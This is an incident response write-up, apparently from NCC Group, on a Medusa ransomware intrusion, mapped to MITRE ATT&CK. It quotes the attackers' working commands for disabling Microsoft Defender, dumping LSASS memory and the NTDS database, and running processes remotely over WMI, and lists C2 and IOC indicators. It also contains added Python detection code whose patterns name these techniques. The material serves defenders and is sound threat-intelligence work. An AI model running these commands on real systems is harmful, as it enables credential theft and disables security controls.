Intro
Our technical experts have written a blog series focused on the Tactics, Techniques and Procedures (TTPs) deployed by four ransomware families recently observed during NCC Group’s incident response engagements.
In case you missed it, our last post analysed an Incident Response engagement involving the D0nut extortion group. In this instalment, we take a deeper dive into Medusa.
Not to be confused with MedusaLocker, Medusa, first observed in 2021, is a Ransomware-as-a-Service (RaaS) that often uses the double extortion method for monetary gain. In 2023 the group’s activity increased with the launch of the ‘Medusa Blog’, a platform used to leak data belonging to victims.
Summary
This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving Medusa Ransomware.
Below is a summary of the findings presented in this blog post:
- Use of web shells to maintain access.
- Utilising PowerShell to conduct malicious activity.
- Dumping password hashes.
- Disabling antivirus services.
- Use of Windows utilities for discovery activities.
- Reverse tunnel for C2.
- Data exfiltration.
- Deployment of Medusa ransomware.
Medusa
Medusa ransomware is a variant that is believed to have been around since June 2021 [1]. Medusa is an example of a double-extortion ransomware, where the threat actor both exfiltrates and encrypts data. The threat actor threatens to release or sell the victim’s data on the dark web if the ransom is not paid, so the group behind Medusa ransomware can be characterised as financially motivated. Victims of Medusa ransomware come from no particular industry, suggesting the group behind this variant has no issue with harming any organisation.
Incident Overview
Initial access was gained by exploiting an external facing web server. Web shells were created on the server, which gave the threat actor access to the environment. From initial access to the execution of the ransomware, a wide variety of activity was observed, such as executing Base64 encoded PowerShell commands, dumping password hashes, and disabling antivirus services. Data was exfiltrated and later appeared on the Medusa leak site.
Timeline
T – Initial Access gained via web shells.
T+13 days – Execution activity.
T+16 days – Persistence activity.
T+164 days – Defense Evasion activity.
T+172 days – Persistence and Discovery activity.
T+237 days – Defense Evasion and Credential Access activity started.
T+271 days – Ransomware executed.
Mitre TTPs
Initial Access
The threat actor gained initial access by exploiting a vulnerable application hosted by an externally facing web server. Web shells were deployed to gain a foothold in the victim’s environment and maintain access.
Execution
PowerShell was leveraged by the threat actor to conduct various malicious activity such as:
- Downloading executables
  - Example: powershell.exe -noninteractive -exec bypass powershell -exec bypass -enc …
- Disabling Microsoft Defender
  - Example: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;
- Deleting executables
  - Example: powershell.exe -noninteractive -exec bypass del C:\PRogramdata\re.exe
- Conducting discovery activity
  - Example: powershell.exe -noninteractive -exec bypass net group domain admins /domain
Windows Management Instrumentation (WMI) was utilised to remotely execute a cmd.exe process: wmic /node:<IP ADDRESS> / user:<DOMAIN\USER> /password:<REDACTED> process call create 'cmd.exe'.
Scheduled tasks were used to execute c:\programdata\a.bat. It is not known exactly what a.bat was used for; however, analysis of a compiled ASPX file revealed the threat actor had used PowerShell to install anydesk.msi:
- powershell Invoke-WebRequest -Uri hxxp://download.anydesk[.]com/AnyDesk.msi -OutFile anydesk.msi
- msiExec.exe /i anydesk.msi /qn
A cmd.exe process was started with the following argument list: c:\programdata\a.bat';start-sleep 15;ps AnyDeskMSI
Various services were installed by the threat actor. PDQ Deploy was installed to deploy LAdHW.sys, a kernel driver which disabled antivirus services. Additionally, PSEXESVC.exe was installed on multiple servers. On one server, it was used to modify the firewall to allow WMI connections.
Persistence
Maintaining access to the victim’s network was achieved by creating a new user, ‘admin’, on the external facing web server (believed to be the initial access server). Additionally, on the two external facing web servers, web shells were uploaded to establish persistent access and execute commands remotely. JavaScript-based web shells were present on one web server and the GhostWebShell [2] was found on the other. The GhostWebShell is fileless; however, its compiled versions were saved in C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH>.
Defence Evasion
The variety of defence evasion techniques utilised shows that evading detection was one of the aims of this threat actor. Antivirus agents were removed from all affected hosts, including the antivirus server. Microsoft Windows Defender capabilities were disabled by the threat actor using: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;
Additionally, LAdHW.sys, a signed kernel mode driver, was installed as a new service to disable antivirus services. The following firewall rule was deleted: powershell.exe -Command & {Remove-NetFirewallRule -DisplayName "<Antivirus Agent Firewall Rule Name>"}
The threat actor obfuscated their activity. Base64 encoded PowerShell commands were utilised to download malicious executables. It should be noted that many of these executables, such as JAVA64.exe and re.exe, were deleted after use. Additionally, Sophos.exe (see below), which was packed with Themida, was executed.

Figure 1 – Sophos.exe.
The value of HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest\UseLogonCredential was modified to 1 so that logon credentials were stored in cleartext. This enabled the threat actor to conduct credential dumping activities.
Credential Access
The following credential dumping techniques were utilised by the threat actor:
- Using the Nishang payload to dump password hashes. Nishang is a collection of PowerShell scripts and payloads. The Get-PassHashes script, which requires admin privileges, was used.
- Mimikatz was present on one of the external facing web servers, named trust.exe. A file named m.txt was identified within C:\Users\admin\Desktop, the same location as the Mimikatz executable.
- An LSASS memory dump was created using the built-in Windows tool, comsvcs.dll:
  - powershell -exec bypass -c "rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ((ps lsass).id) C:\programdata\test.png full
- The built-in Windows tool ntdsutil.exe was used to extract the NTDS:
  - powershell ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\programdata\nt' q q
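The PowerShell command lines quoted in the Execution, Defence Evasion and Credential Access sections share a few stable tokens (-exec bypass, Set-MpPreference -DisableRealtimeMonitoring, DisableAntiSpyware, comsvcs.dll MiniDump, ntdsutil ifm) that can be matched in process-creation telemetry, provided any -enc payload is first decoded from UTF-16LE Base64. The Python below is an added detection example, not NCC Group's code; the signature names, event ids, and sample events are constructed for illustration.

```python
import base64
import re

# Indicators drawn from the commands quoted in this post, matched against the
# lower-cased command line plus the decoded text of any -enc argument.
SIGNATURES = {
    "powershell_exec_bypass": r"-exec(?:utionpolicy)?\s+bypass",
    "encoded_powershell": r"-e(?:nc|ncodedcommand)?\s+[a-z0-9+/=]{16,}",
    "defender_realtime_disabled": r"set-mppreference.*-disablerealtimemonitoring\s+\$?true",
    "defender_antispyware_policy": r"windows defender.*disableantispyware.*-value\s+1",
    "firewall_rule_removed": r"remove-netfirewallrule",
    "wdigest_cleartext_logon": r"wdigest.*uselogoncredential",
    "lsass_dump_comsvcs": r"comsvcs\.dll\s*,\s*minidump",
    "ntds_ifm_extract": r"ntdsutil.*\bifm\b",
}
_ENC_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmd):
    """Return the UTF-16LE text behind a PowerShell -enc argument, or None."""
    m = _ENC_ARG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # truncated or non-Base64 payload: nothing to decode


def scan_command_line(cmd):
    """Return the names of every signature the (decoded) command line hits."""
    text = cmd.lower()
    decoded = decode_encoded_command(cmd)
    if decoded:
        text += "\n" + decoded.lower()
    return [name for name, pat in SIGNATURES.items() if re.search(pat, text, re.S)]


def scan_events(events):
    """Map each event id to its findings, dropping events that hit nothing."""
    return {eid: hits for eid, cmd in events.items() if (hits := scan_command_line(cmd))}


def utf16_base64(text):
    """Used only to build the constructed -enc sample below."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample events: evt1-evt4 are command lines quoted in the post,
# evt5 hides a Defender-tampering cmdlet behind -enc, evt6 is a benign control.
SAMPLE_EVENTS = {
    "evt1": "powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;"
            "New-ItemProperty -Path 'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender' "
            "-Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;",
    "evt2": 'powershell -exec bypass -c "rundll32.exe C:\\windows\\System32\\comsvcs.dll, '
            "MiniDump ((ps lsass).id) C:\\programdata\\test.png full",
    "evt3": "powershell ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\programdata\\nt' q q",
    "evt4": "powershell.exe -noninteractive -exec bypass del C:\\PRogramdata\\re.exe",
    "evt5": "powershell.exe -noninteractive -exec bypass -enc "
            + utf16_base64("Set-MpPreference -DisableRealtimeMonitoring $true"),
    "evt6": "powershell.exe -Command Get-Date",
}
```

Run over real telemetry, the decoded text should also be logged alongside the raw command line, since the -enc form is what shows up in the process-creation event.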
Discovery
The threat actor conducted the following discovery activity:

| Type of discovery activity | Description |
|---|---|
| nltest /trusted_domains | Enumerates domain trusts |
| net group 'domain admins' /domain | Enumerates domain groups |
| net group 'domain computers' / domain | Enumerates domain controllers |
| ipconfig /all | Learn about network configuration and settings |
| tasklist | Displays a list of currently running processes on a computer |
| quser | Show currently logged on users |
| whoami | Establish which user they were running as |
| wmic os get name | Gathers the name of the operating system |
| wmic os get osarchitecture | Establishes the operating system architecture |
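Every command in the table above is a legitimate administration tool, so any one of them on its own is weak evidence; what stands out in this case is several different enumeration commands run by one account in quick succession. The Python below is an added example (not NCC Group's tooling) that classifies process-creation command lines into the categories from the table and alerts when one host/user pair covers several categories inside a short window; the event format, thresholds and sample events are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery commands from the table above, mapped to the information they expose.
DISCOVERY_PATTERNS = [
    ("domain_trusts", re.compile(r"\bnltest(?:\.exe)?\b.*/trusted_domains", re.I)),
    ("domain_groups", re.compile(r"\bnet(?:1|\.exe)?\s+group\b.*/\s*domain", re.I)),
    ("network_config", re.compile(r"\bipconfig(?:\.exe)?\b.*/all", re.I)),
    ("running_processes", re.compile(r"\btasklist(?:\.exe)?\b", re.I)),
    ("logged_on_users", re.compile(r"\bquser(?:\.exe)?\b", re.I)),
    ("current_user", re.compile(r"\bwhoami(?:\.exe)?\b", re.I)),
    ("os_information", re.compile(r"\bwmic(?:\.exe)?\s+os\s+get\b", re.I)),
]


def classify(cmd):
    """Return the discovery categories a process command line falls into."""
    return [name for name, pat in DISCOVERY_PATTERNS if pat.search(cmd)]


def find_discovery_bursts(events, window=timedelta(minutes=10), min_categories=4):
    """Flag (host, user) pairs that run at least min_categories distinct
    discovery commands inside one sliding window. A lone whoami is routine;
    several different enumeration commands within minutes is the pattern here."""
    per_actor = defaultdict(list)
    for ev in events:
        ts = datetime.fromisoformat(ev["ts"])
        for cat in classify(ev["cmd"]):
            per_actor[(ev["host"], ev["user"])].append((ts, cat))
    alerts = []
    for (host, user), hits in per_actor.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            cats = {cat for ts, cat in hits[i:] if ts - start <= window}
            if len(cats) >= min_categories:
                alerts.append({"host": host, "user": user,
                               "window_start": start.isoformat(),
                               "categories": sorted(cats)})
                break  # one alert per actor is enough for triage
    return alerts


# Constructed process-creation events (timestamp, host, user, command line).
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T09:00:00", "host": "WEB01", "user": "admin", "cmd": "nltest /trusted_domains"},
    {"ts": "2024-05-01T09:00:40", "host": "WEB01", "user": "admin",
     "cmd": "powershell.exe -noninteractive -exec bypass net group domain admins /domain"},
    {"ts": "2024-05-01T09:01:15", "host": "WEB01", "user": "admin", "cmd": "ipconfig /all"},
    {"ts": "2024-05-01T09:02:00", "host": "WEB01", "user": "admin", "cmd": "tasklist"},
    {"ts": "2024-05-01T09:02:30", "host": "WEB01", "user": "admin", "cmd": "quser"},
    {"ts": "2024-05-01T09:03:00", "host": "WEB01", "user": "admin", "cmd": "wmic os get osarchitecture"},
    {"ts": "2024-05-01T11:30:00", "host": "FS02", "user": "svc_backup", "cmd": "whoami"},
    {"ts": "2024-05-01T13:00:00", "host": "FS02", "user": "svc_backup", "cmd": "ipconfig /all"},
]
```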
Lateral Movement
Remote Desktop Protocol (RDP) was employed to laterally move through the victim’s network.
Command and Control
A reverse tunnel allowed the threat actor to establish a new connection from a local host to a remote host. The binary c:\programdata\re.exe was executed and connected to 134.195.88[.]27 over port 80 (HTTP). Threat actors tend to use common protocols to blend in with legitimate traffic, which can be seen in this case, as port 80 was used.
Additionally, the JWrapper Remote Access application was installed on various servers to maintain access to the environment. AnyDesk was also utilised by the threat actor.
Exfiltration
Data was successfully exfiltrated by the threat actor. The victim’s data was later published to the Medusa leak site.
Impact
The Medusa ransomware, in the form of gaze.exe, was deployed to the victim’s network. Files were encrypted, and .MEDUSA was appended to file names. The ransom note was named !!!READ_ME_MEDUSA!!!.txt. System recovery was inhibited due to the deletion of all VMs from the Hyper-V storage as well as local and cloud backups.
Indicators of Compromise

| IOC Value | Indicator Type | Description |
|---|---|---|
| webhook[.]site | Domain | Malicious webhook |
| bashupload[.]com | Domain | Download JAVA64.exe and RW.exe |
| tmpfiles[.]org | Domain | Download re.exe |
| 134.195.88[.]27:80 | IP:PORT | C2 |
| 8e8db098c4feb81d196b8a7bf87bb8175ad389ada34112052fedce572bf96fd6 | SHA256 | trust.exe (Mimikatz.exe) |
| 3e7529764b9ac38177f4ad1257b9cd56bc3d2708d6f04d74ea5052f6c12167f2 | SHA256 | JAVA_V01.exe |
| f6ddd6350741c49acee0f7b87bff7d3da231832cb79ae7a1c7aa7f1bc473ac30 | SHA256 | testy.exe / gmer_th.exe |
| 63187dac3ad7f565aaeb172172ed383dd08e14a814357d696133c7824dcc4594 | SHA256 | JAVA_V02.exe |
| 781cf944dc71955096cc8103cc678c56b2547a4fe763f9833a848b89bf8443c6 | SHA256 | Sophos.exe |
| C:\Users\Sophos.exe | File Path | Sophos.exe |
| C:\Users\admin\Desktop\ | File Path | trust.exe, JAVA_V01.exe, testy.exe, gmer_th.exe, JAVA_V02.exe |
| C:\ProgramData\JWrapper-Remote Access\ | File Path | JWrapper files |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH> | File Path | GhostWebshell compiled files |
| C:\Windows\PSEXESVC.exe | File Path | PsExec |
| C:\Users\<USERS>\AppData\Local\Temp\LAdHW.sys | File Path | Disables AV |
| C:\Windows\AdminArsenal\PDQDeployRunner\service-1\PDQDeployRunner-1.exe | File Path | PDQDeployRunner – used to deploy LAdHW.sys |
| C:\Users\<USER>\AppData\Local\Temp\2\gaze.exe, C:\Windows\System32\gaze.exe | File Path | Ransomware executable |
MITRE ATT&CK®

| Tactic | Technique | ID | Description |
|---|---|---|---|
| Initial Access | Exploit Public-Facing Application | T1190 | A vulnerable application hosted by an external facing web server was exploited. |
| Execution | Windows Management Instrumentation | T1047 | WMI was used to remotely execute a cmd.exe process. |
| Execution | Scheduled Task/Job: Scheduled Task | T1053.005 | Execute a.bat |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | PowerShell was leveraged to execute malicious commands. |
| Execution | Software Deployment Tools | T1072 | PDQ Deploy was installed to deploy LAdHW.sys. |
| Execution | System Services: Service Execution | T1569.002 | PsExec was installed as a service. |
| Persistence | Create Account: Domain Account | T1136.002 | A new user ‘admin’ was created to maintain access. |
| Persistence | Server Software Component: Web Shell | T1505.003 | Web shells were utilised to maintain access. |
| Defense Evasion | Obfuscated Files or Information: Software Packing | T1027.002 | Sophos.exe was packed with Themida. |
| Defense Evasion | Indicator Removal: File Deletion | T1070.004 | Malicious executables were deleted after use. |
| Defense Evasion | Indicator Removal: Clear Persistence | T1070.009 | Malicious executables were deleted after use. |
| Defense Evasion | Obfuscated Files or Information | T1027 | Base64 encoded PowerShell commands were utilised to download malicious executables. |
| Defense Evasion | Modify Registry | T1112 | The WDigest registry key was modified to enable credential dumping activity. |
| Defense Evasion | Impair Defenses: Disable or Modify Tools | T1562.001 | Antivirus services were disabled. |
| Defense Evasion | Impair Defenses: Disable or Modify System Firewall | T1562.004 | Firewall rules were deleted. |
| Credential Access | OS Credential Dumping: LSASS Memory | T1003.001 | Mimikatz was utilised. An LSASS memory dump was created. |
| Credential Access | OS Credential Dumping: NTDS | T1003.003 | Ntdsutil.exe was used to extract the NTDS. |
| Discovery | Domain Trust Discovery | T1482 | Nltest was used to enumerate domain trusts. |
| Discovery | Permission Groups Discovery: Domain Groups | T1069.002 | Net was used to enumerate domain groups. |
| Discovery | System Network Configuration Discovery | T1016 | Ipconfig was used to learn about network configurations. |
| Discovery | System Service Discovery | T1007 | Tasklist was used to display running processes. |
| Discovery | Remote System Discovery | T1018 | Net was used to enumerate domain controllers. |
| Discovery | System Owner/User Discovery | T1033 | Quser was used to show logged in users. Whoami was used to establish which user the threat actor was running as. |
| Discovery | System Information Discovery | T1082 | Wmic was used to gather the name of the operating system and its architecture. |
| Lateral Movement | Remote Services: Remote Desktop Protocol | T1021.001 | RDP was used to laterally move through the environment. |
| Command and Control | Ingress Tool Transfer | T1105 | PowerShell commands were used to download and execute malicious files. |
| Command and Control | Remote Access Software | T1219 | JWrapper and AnyDesk were leveraged. |
| Command and Control | Protocol Tunnelling | T1572 | A reverse tunnel was established. |
| Exfiltration | Exfiltration | TA0010 | Data was exfiltrated and published to the leak site. |
| Impact | Data Encrypted for Impact | T1486 | Medusa ransomware was deployed. |
| Impact | Inhibit System Recovery | T1490 | VMs from the Hyper-V storage and local and cloud backups were deleted. |
References
[2] https://www.mdsec.co.uk/2020/10/covert-web-shells-in-net-with-read-only-web-paths/
Originally published by Molly Dewis: Don’t throw a hissy fit; defend against Medusa